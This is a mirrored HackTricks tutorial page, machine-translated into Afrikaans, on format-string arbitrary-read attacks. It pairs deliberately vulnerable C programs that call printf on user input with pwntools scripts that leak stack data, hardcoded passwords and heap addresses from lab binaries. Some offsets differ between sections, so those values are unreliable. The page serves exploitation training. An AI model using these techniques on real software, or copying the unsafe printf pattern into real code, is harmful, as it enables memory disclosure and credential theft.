Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md

190 lines
6.7 KiB
Markdown
Raw Permalink Blame History

# Formaat Strings - Willekeurige Lees Voorbeeld
{% hint style="success" %}
Leer & oefen AWS Hacken:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacken: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Ondersteun HackTricks</summary>
* Controleer de [**abonnementsplannen**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Lees Binêre Begin
### Kode
```c
#include <stdio.h>
int main(void) {
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
return 0;
}
```
Stel dit saam met:
```python
clang -o fs-read fs-read.c -Wno-format-security -no-pie
```
### Uitbuiting
```python
from pwn import *
p = process('./fs-read')
payload = f"%11$s|||||".encode()
payload += p64(0x00400000)
p.sendline(payload)
log.info(p.clean())
```
* Die **offset is 11** omdat die instelling van verskeie As en **brute-forcing** met 'n lus offsets vanaf 0 tot 50 gevind het dat by offset 11 en met 5 ekstra karakters (pype `|` in ons geval), dit moontlik is om 'n volledige adres te beheer.
* Ek het **`%11$p`** gebruik met vulling totdat ek sien dat die adres almal 0x4141414141414141 was.
* Die **formaat string lading is VOOR die adres** omdat die **printf ophou lees by 'n nul byte**, so as ons die adres stuur en dan die formaat string, sal die printf nooit die formaat string bereik nie aangesien 'n nul byte gevind sal word voor dit.
* Die gekose adres is 0x00400000 omdat dit waar die binêre begin (geen PIE)
```c
#include <stdio.h>
#include <string.h>
char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
int main() {
char stack_password[20] = "secretStackPass"; // Password in stack
char input1[20], input2[20];
printf("Enter first password: ");
scanf("%19s", input1);
printf("Enter second password: ");
scanf("%19s", input2);
// Vulnerable printf
printf(input1);
printf("\n");
// Check both passwords
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
printf("Access Granted.\n");
} else {
printf("Access Denied.\n");
}
return 0;
}
```
Stel dit saam met:
```bash
clang -o fs-read fs-read.c -Wno-format-security
```
### Lees vanaf stak
Die **`stack_password`** sal in die stak gestoor word omdat dit 'n plaaslike veranderlike is, so net printf misbruik om die inhoud van die stak te wys is genoeg. Dit is 'n aanval om die eerste 100 posisies te lek om die wagwoorde van die stak te onthul:
```python
from pwn import *
for i in range(100):
print(f"Try: {i}")
payload = f"%{i}$s\na".encode()
p = process("./fs-read")
p.sendline(payload)
output = p.clean()
print(output)
p.close()
```
In die beeld is dit moontlik om te sien dat ons die wagwoord van die stok in die `10de` posisie kan lek:
<figure><img src="../../.gitbook/assets/image (1234).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1233).png" alt="" width="338"><figcaption></figcaption></figure>
### Lees data
Deur dieselfde aanval uit te voer, maar met `%p` in plaas van `%s`, is dit moontlik om 'n heap-adres van die stok te lek by `%25$p`. Verder, deur die gelekte adres (`0xaaaab7030894`) te vergelyk met die posisie van die wagwoord in die geheue in daardie proses, kan ons die adresverskil verkry:
<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
Nou is dit tyd om te vind hoe om 1 adres in die stok te beheer om dit van die tweede formaatstringkwesbaarheid te benader:
```python
from pwn import *
def leak_heap(p):
p.sendlineafter(b"first password:", b"%5$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)
for i in range(30):
p = process("./fs-read")
heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")
password_addr = heap_leak_addr - 0x126a
print(f"Try: {i}")
payload = f"%{i}$p|||".encode()
payload += b"AAAAAAAA"
p.sendline(payload)
output = p.clean()
print(output.decode("utf-8"))
p.close()
```
En dit is moontlik om te sien dat in die **poging 14** met die gebruikte deurgang ons 'n adres kan beheer:
<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
### Uitbuit
```python
from pwn import *
p = process("./fs-read")
def leak_heap(p):
# At offset 25 there is a heap leak
p.sendlineafter(b"first password:", b"%25$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)
heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")
# Offset calculated from the leaked position to the possition of the pass in memory
password_addr = heap_leak_addr + 0x1f7bc
print(f"Calculated address is: {hex(password_addr)}")
# At offset 14 we can control the addres, so use %s to read the string from that address
payload = f"%14$s|||".encode()
payload += p64(password_addr)
p.sendline(payload)
output = p.clean()
print(output)
p.close()
```
<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
{% hint style="success" %}
Leer & oefen AWS-hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP-hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Ondersteun HackTricks</summary>
* Kontroleer die [**inskrywingsplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
{% endhint %}
Reference in a new issue View git blame Copy permalink